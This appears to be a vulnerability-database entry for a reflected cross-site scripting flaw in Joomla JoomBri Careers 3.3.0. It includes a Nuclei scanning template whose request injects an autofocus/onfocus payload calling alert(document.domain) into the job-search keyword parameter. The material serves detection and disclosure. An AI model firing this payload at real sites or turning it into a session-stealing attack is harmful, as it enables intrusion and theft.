joomla-joombri-careers-xss: Joomla JoomBri Careers 3.3.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Joomla JoomBri Careers | POC: 已公开

漏洞描述

The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

PoC代码[已公开]

id: joomla-joombri-careers-xss

info:
  name: Joomla JoomBri Careers 3.3.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://packetstormsecurity.com/files/168641/Joomla-JoomBri-Careers-3.3.0-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2022100024
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
  tags: packetstorm,xss,joomla,joombri,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3D%22alert(document.domain)%22autofocus%3D%22ak5aghi5u9p"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "alert(document.domain)") && contains(body, "Joomla") && contains(tolower(body), "joombri")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220220adc815e76df5ea5de67d14071630ee8dca76f8b93ad576af6ad00d6592568022100c09090081fcd62dc9f63745c8a612b70cc6464dbc986c34b1a451a9016a8d410:922c64590222798bb761d5b6d8e72950